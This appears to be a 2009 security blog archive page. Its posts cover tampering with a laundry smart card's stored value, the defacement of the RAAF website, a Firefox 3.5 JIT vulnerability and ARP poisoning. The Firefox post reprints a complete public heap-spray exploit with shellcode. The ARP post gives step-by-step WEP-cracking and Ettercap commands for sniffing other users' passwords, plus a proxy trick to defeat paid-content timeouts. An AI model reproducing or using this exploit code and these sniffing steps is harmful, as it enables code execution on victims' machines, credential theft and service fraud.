Cyberwarfare Magazine

Warfare in the Information Age

Archive for July 2009

A Study of Smart Cards

with 6 comments

Cards are quite an interesting species of object that have invaded our lives in every way: we either use them for public transit, laundry, gift cards, phone cards, credit cards etc… One could gather quite a lot of power buy not only understanding their functioning, but also by being able to tamper their data. I must admit that I have absolutely no knowledge (or almost) of those devices, but hopefully, by the end of this project, this will have completely changed.

Visual Study of Smart Cards

Smarts card are usually the size of the credit cards and dimensions are defined accordingly to the ISO/IEC 7810 standard. The standard defines four card sizes: ID-1, ID-2, ID-3 and ID-000. Smart cards are usually comprised in the ID-1 category although some are into the ID-000 category, which mostly comprise of SIM cards. Each of them are 0.76 mm thick. The properties are defined as follow1:

Example of a card using a chip

Example of a card using a chip

Format Dimension Usage
ID-1 85.60 × 53.98 mm Most banking cards and ID cards
ID-2 105 × 74 mm German ID cards issued prior to Nov 2010
ID-3 125 × 88 mm Passports and Visas
ID-000 25 × 15 mm SIM cards

The material use for the card is usually Polyvinyl chloride (PVC). Of course the most interesting item on rhe card is that golden connector. There are various type of connectors as shown in the picture below:

Different Layouts of Cardpads

Different Layouts of Cardpads

There are also three main types of smart cards: contact cards, contactless and vault cards [2]

The three main types of Smart Card available

The three main types of Smart Card available

Actually the two that are actually important in everybody’s life are the contact and contactless cards, the latest being use in public transit most of the time. For now I’ll concentrate on contact cards.

Contact Cards

Information is transferred using electrical connectors, i.e the golden chip on the card to the reader. Usually, the chip as around 8 connectors as follow:

Now contact cards are divided in two categories : memory cards and multiprocessor cards. Memory cards are furthermore divided into 3 categories:

  • Straight Memory Cards
  • Protected/Segmented Memory Cards
  • Stored Value Memory Cards

The Project

I recently got handed a laundry smart card and for some reason, got fascinated with it. I never really played with hardware but studying those devices have interested me to the point of studying them in a special project. The goal is to be able to modify the contents of the memory of the card. This project will be conducted in two phases :

  1. Dump the content of the memory into my computer
  2. Alter the content and write it back to the card

System Description

A client is handled a Smart Card called “SmartCity” from a company called Coinamatic, which provide laundry solutions to property managers. The card can be loaded and recharged using coins or debit/credit cards through “reload centers“. You can put up to 50$ maximum on the card. To use the facilites, you need to insert the card  into a slot built into the washers/dryers. The washer is a Commercial Energy Advantage Top Load Washer MAT14PRAWW model. The dryer is a 27″ Commercial Single-Load Electric Stack Dryer model MLE24PRAZW.

Next post : the card reader/writer

See also:

EMV 4.2 Specification, EMVCo, May 2008, http://emvco.com/ accessed on 2009-07-20

Infineon SLE4442, Flylogic Engineering’s Analytical Blog, December 1st, 2007, http://www.flylogic.net/blog/?p=17 accessed on 2009-07-20

How-to: Read a FedEx Kinko’s smart card (SLE4442), Ian Lesnet, Hack-a-day, November 28th, 2008, http://hackaday.com/2008/11/25/how-to-read-a-fedex-kinkos-smart-card-sle4442/, accessed on 2009-07-20

Intelligent 256-Byte EEPROM SLE 4432/SLE 4442, Siemens, 1995, http://www.smartcardsupply.com/PDF/DS_sle4432_42_0795.pdf accessed on 2009-07-20

Kinko’s Smart Card (Siemens SLE4442 memory chip), Strom Calson, http://www.stromcarlson.com/projects/smartcard/format.pdf accessed on 2009-07-20

1K EEPROM – Security Logic with Two Application Zones AT88SC102, Atmel, 1999, http://www.datasheetcatalog.org/datasheet/atmel/DOC1419.PDF accessed on 2009-07-20

[1] ISO/IEC 7810, Wikipedia, http://en.wikipedia.org/wiki/ISO/IEC_7810 accessed on 2009-07-20

[2] Types of Chip Cards, Smart Card Basics, 2005,  http://www.smartcardbasics.com/cardtypes.html accessed on 2009-07-20

Written by Jonathan Racicot

July 21, 2009 at 4:45 pm

RAAF website defaced

with 3 comments

Atul Dwivedi, an Indian hacker paid a visit to the Royal Australian Air Force (RAAF) last Monday by defacing their website.

This accident comes amid a raise in violence targeted towards Indian native in Australia and apparently Dwivedi protested this situation by leaving a message on the website:

“This site has been hacked by Atul Dwivedi. This is a warning message to the Australian government. Immediately take all measures to stop racist attacks against Indian students in Australia or else I will pawn all your cyber properties like this one.”

Racist incident in Australia against Indian students has increased in the last months

Racist incident in Australia against Indian students has increased in the last months

This site is now up and running as per normal. Of course the webserver wasn’t connected to any internal network and didn’t contain any classified information according to a spokewoman:

“No sensitive information was compromised as the air force internet website is hosted on an external server and, as such, does not hold any sensitive information,1

Microsoft products are used in pretty much every Western armed forces. So it’s save to assume the webserver used by the RAAF is probably running IIS. Of course, IIS implies as Windows machine and a Windows Server machine means that everything is almost certainly all Microsoft based. Of course we can now verify those claims and according to David M Williams from ITWire2 the website is hosted through Net Logistics, an Australian hosting company. The aforementioned article tries to explain the hack with the use of exploits. Which might have been the way Dwivedi did it, but the analysis is quite simple and lacks depth. The site still has an excellent link to a blog detailing the WebDAV exploit, see below for the link.

It’s not impossible to think that Dwivedi might have tricked someone into giving out too much information also. Social engineering can do lots and is usually easier than technical exploits. The Art of Deception by Kevin Mitnick should convince most people of that. Someone could look up on Facebook or another social networking site for some people in the RAAF and then try to pose as them and pose as them.

Then also, why not look for the FTP server? And God knows what else the server is running; maybe a SMTP server also (and probably it does). Now I wouldn’t suggest doing this, but running a port scan would probably reveal a lot of information. Moreover, using web vulnerability tools like Nikto could help find misconfigured settings in ASP or forgotten test/setup pages/files. Up to there, only two things are important: information gathering and imagination.

See also:

Hacker breaks into RAAF website”, AAP, Brisbane Times, July 16, 2009, http://news.brisbanetimes.com.au/breaking-news-national/hacker-breaks-into-raaf-website-20090716-dmrn.html accessed on 2009-07-17

WebDAV Detection, Vulnerability Checking and Exploitation”, Andrew, SkullSecurity, May 20, 2009, http://www.skullsecurity.org/blog/?p=285 accessed on 2009-07-17


1Indian hacks RAAF website over student attacks”, Asher Moses, The Sydney Morning Herald, July 16, 2009, http://www.smh.com.au/technology/security/indian-hacks-raaf-website-over-student-attacks-20090716-dmgo.html accessed on 2009-07-16

2 “How did Atul Dwivedi hack the RAAF web site this week?”, David M Williams, ITWire, July 17, 2009, http://www.itwire.com/content/view/26344/53/ accessed on 2009-07-16

Firefox Javascript Vulnerability

with one comment

Once again, Javascript is the source of a new exploit that has been recently discovered on Firefox1. The vulnerability can be exploited by crafting malicious Javascript code on a Firefox 3.5 browser and leads to the execution of arbitrary code on the user’s machine. This is due to a vulnerability in the JIT engine of Firefox and affects machine running a x86, SPARC or arm architectures.

The vulnerability resolves around the return value of the escape function in the JIT engine. It’s exploited using the <font> tag. The code for the exploit is public and can be found at milw0rm. The exploit use a heap spraying technique to execute the shellcode.

<html>
<head>
<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Vulnerabilty
</br>
Author: SBerry aka Simon Berry-Byrne
</br>
Thanks to HD Moore for the insight and Metasploit for the payload
<div id="content">

<p>
<FONT>                             
</FONT>
</p>
<p>
<FONT>Loremipsumdoloregkuw</FONT></p>
<p>

<FONT>Loremipsumdoloregkuwiert</FONT>
</p>
<p>
<FONT>Loremikdkw  </FONT>
</p>
</div>
<script language=JavaScript>

 
/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800"+   
                       "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +   
                       "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +   
                       "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +   
                       "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +   
                       "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +   
                       "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +   
                       "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +   
                       "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +   
                       "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +   
                       "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +   
                       "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +   
                       "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +   
                       "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +   
                       "%u652E%u6578%u9000");
/* Heap Spray Code */            
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x60000)  
{
    fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)  
{
    sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()
 
function escapeData(data)
{
 var i;
 var c;
 var escData='';
 for(i=0;i<data.length;i++)
  {
   c=data.charAt(i);
   if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
   escData+=c;
  }
 return escData;
}
 
function DataTranslator(){
    searchArray = new Array();
    searchArray[0] = new Array();
    searchArray[0]["str"] = "blah";
    var newElement = document.getElementById("content")
    if (document.getElementsByTagName) {
        var i=0;
        pTags = newElement.getElementsByTagName("p")
        if (pTags.length > 0)  
        while (i<pTags.length)
        {
            oTags = pTags[i].getElementsByTagName("font")
            searchArray[i+1] = new Array()
            if (oTags[0])  
            {
                searchArray[i+1]["str"] = oTags[0].innerHTML;
            }
            i++
        }
    }
}
 
function GenerateHTML()
{
    var html = "";
    for (i=1;i<searchArray.length;i++)
    {
        html += escapeData(searchArray[i]["str"])
    }    
}
DataTranslator();
GenerateHTML()

</script>
</body>
</html>
<html><body></body></html>

# milw0rm.com [2009-07-13]

A fix should be available soon, but the best solution is always to disable Javascript, although a lot of sites rely on it to operate. Another way is to use the NoScript plug-in, which let you enable and disable scripts easily according to a whitelist/blacklist system.

See also:

Mozilla Firefox Memory Corruption Vulnerability”, Secunia, July 14, 2009, http://secunia.com/advisories/35798/ accessed on 2009-07-15

Exploit 9137”, SBerry, July 13, 2009, http://milw0rm.com/exploits/9137 accessed on 2009-07-15

Stopgap Fix for Critical Firefox 3.5 Security Hole”, Brian Krebs, The Washington Post, July 14, 2009, http://voices.washingtonpost.com/securityfix/2009/07/stopgap_fix_for_critical_firef.html accessed on 2009-07-15

Critical JavaScript vulnerability in Firefox 3.5”, Mozilla Security Blog, July 14, 2009, http://blog.mozilla.com/security/2009/07/14/critical-javascript-vulnerability-in-firefox-35/ accessed on 2009-07-15


1 “Mozilla Foundation tackles Firefox bug”, Nick Farell, The Inquirer, Wednesday, 15, July, 2009, http://www.theinquirer.net/inquirer/news/1433480/mozilla-foundation-tackles-firefox-bug accessed on 2009-07-15

Written by Jonathan Racicot

July 15, 2009 at 3:41 pm

A small and quick introduction to ARP poisoning

with 2 comments

This article won’t be about something new nor something extraordinary for any experienced computer security or even the average hacker, but since I’ve been ask this question quite often by some of my friends, I decided to explain how to sniff passwords from a network.  Moreover, I’m well aware I haven’t been writing anything for a while, and I want to get back to it once all my personal matters are resolved. I’ll concentrate on WEP wireless networks since they are almost certain to be cracked easily. Although those a deprecated, there are still used in many household as the out-of-the-box default configuration, so it’s still pertinent in my opinion. Then I will explain the ARP (Address Resolution Protocol) poisoning attack, which will be used to intercept packets between the target and the Internet.

Attacking the WEP wireless network

Packets in a WEP network are encryted, so in order to sniff packets off from it, you’ll first need to acquire the WEP key. This can be done easily with a wireless network adapter that supports monitor mode and the aircrack suite. For the adapter, I’m using the Linksys  Compact Wireless-G USB adapter, model no WUSB54GC. Plug your adapter into a USB connector and boot up your machine. Once you have booted up, make sure Backtrack or any other distribution has detected your adapter:

ifconfig rausb0 up

and then put the adapter in “Monitor Mode”

iwconfig rausb0 mode monitor

The goal of a WEP attack is to capture as many initialization vectors (IVs) as possible. IVs are random numbers used with a either 64, 128 and 256-bit key to encrypt a stream cipher. Those are used so that two exact same plain text do not produce the same ciphertext. The problem with WEP is that IVs are very short, and on a busy network, the same vectors get reused quickly. The IV is 24 bit long, therefore there are 16 777 216 possibilities1. Moreover, changing the IV for each packet is optional. The keys are also quite short, therefore opening the possibility of finding the key with some brute force calculation. No matter what is they key length, you will just need more packets.

The WEP protocol then use the randomly generated IV, the WEP key and pass it throught the RC4 cipher to produce a keystream. The keystream is then XORed with the plain text stream to produce the cipher text, as shown in the picture below:

WEP Encryption Schema

WEP Encryption Schema (from Wikipedia)

So basically, if you get many packets with the same Ivs, different ciphertext, you can now try to brute-force the WEP key. And to get those packets, you need traffic on the network. Now if there are already some people connected and surfing the web, you can easily capture packets and replay them to get more IVs, otherwise, you need to generate the traffic yourself.

Once you’ve tell airodump to capture IVs, we will use aireplay to generate more traffic, and therefore capture more IVs quickly. If you look at the airodump screen, you’ll see it capturing packets.

Once you have the key, you can finally start the poisoning process. As you have seen, I have not detailed how to crack a WEP network as it is widely described all over the net. You can find find good video tutorials from InfinityExists here and here. The last 2600 issue also had a good article about it.

The ARP poisoning attack

The concept behind this is simple. ARP is the protocol that maintains network devices tables up-to-date by associating an IP address with a MAC address. The problem with ARP is that it doesn’t really care about who answered, it will gladly update the tables from whoever says so. Most of the time, it won’t even ask. So the idea behind the attack, is to send the client an ARP answer saying “hey, I’m the gateway, send stuff to me” and a second ARP answer to the real gateway saying “hey there, I’m this guy, send me his stuff”. Then you just have to relay the packets between the victim and the gateway.Those schemas are more simply to understand:

Schema of an ARP Poisoning Attack

Schema of an ARP Poisoning Attack

In Linux, the rerouting can be done using the following iptables commands:

iptables -t nat -A PREROUTING -i <interface> -p tcp –dport <port> -j REDIRECT –to-port <redirection port>

iptables -t nat -D PREROUTING -i <interface> -p tcp –dport <port> -j REDIRECT –to-port <redirection port>

I’m showing those commands because you can do a lot with those. Many web applications such as some Flash applications use RTMP (Real-time messaging protocol) to control web applications, which run locally.  Flash server send commands to the application using message. Using those commands, you can filter the packets send or receive from the Flash server. Simply use a sniffer first, then locate which packets you wish to drop, alter or whatever.

For example, some sites gives you samples of live music or videos for 30 seconds, then nag you to pay. Using a sniffer, analyze the traffic and find that RTMP Invoke packet that closes the connection with the server. Code a quick proxy that will let all packets go to the flash application except for the connection closing RTMP packet. Then use the commands above to redirect traffic to your proxy.

00 03 0d 4f c0 6d 00 11  20 a8 32 8b 08 00 45 00 …O.m..  .2…E.
00 b2 7e 52 40 00 78 06  d0 a1 50 4d 74 05 43 c1 ..~R@.x. ..PMt.C.
ab 3e 07 8f d0 d8 9b a6  b0 eb ea 61 49 3d 80 18 .>…… …aI=..
fe 4a 76 52 00 00 01 01  08 0a 00 ef a6 d0 02 43 .JvR…. …….C
f4 32 43 00 00 00 00 00  76 14 02 00 0f 63 6c 6f .2C….. v….clo
73 65 43 6f 6e 6e 65 63  74 69 6f 6e 00 00 00 00 seConnec tion….
00 00 00 00 00 05 02 00  57 32 30 38 20 46 72 65 …….. W208 Fre
65 63 68 61 74 20 61 63  74 69 76 69 74 79 20 74 echat ac tivity t
69 6d 65 6f 75 74 2e 20  49 66 20 79 6f 75 20 77 imeout.  If you w
65 72 65 20 61 20 6d 65  6d 62 65 72 2c 20 74 68 ere a me mber, th
65 20 66 72 65 65 20 63  68 61 74 20 77 6f 75 6c e free c hat woul
64 20 6e 6f 74 20 74 69  6d 65 20 6f 75 74 21 20 d not ti me out!

Example of a RTMP Invoke packet to close a connection.

Of course you could just use Ettercap, which does exactly what have been mentioned above. Start Ettercap with the following:

sudo ettercap -G -W 128:p:25AAAAC18DEADDADA433332B65

This will open the graphical interface (-G), that is if you have installed the GTK interface to Ettercap. -W specify to listen for wireless networks and to use a 128-bit key with key found earlier. I don’t know what the p is really for. You can also use the text mode.

Ettercap

Ettercap

Then select Sniffing > Unified Sniffing > select on which interface you want to sniff. Then start the sniffing: File > Start Sniffing. Now let’s specify which targets you wanna sniff. Go to Hosts > Scan for hosts. That will locate the hosts on the current network. Then popup the hosts list, Hosts > Show Hosts List.

Ettercap - Hosts Found on the Network

Ettercap - Hosts Found on the Network

On the list, add the router to target 2 and the hosts you wanna sniff to target 1. Only one step left: MITM > ARP poisoning.  Select Sniff Remote Connections > OK.

Ettercap ARP Poisoining Options

Ettercap ARP Poisoining Options

Then you wait for users to connect to pages like MySpace or Hotmail etc…and Ettercap will find out the sensitive information for you.

See also:

Wireless Networking, Praphul Chandra, Alan Bensky, Ron Olexa, Daniel Mark Dobkin, David A. Lide, Farid Dowla

RFC 826 – Ethernet Address Resolution Protocol, David C. Plummer, November 1982, http://www.faqs.org/rfcs/rfc826.html

Wired Equivalent Protocol, Wikipedia, http://en.wikipedia.org/wiki/Wired_Equivalent_Privacy

Ettercap, http://ettercap.sourceforge.net/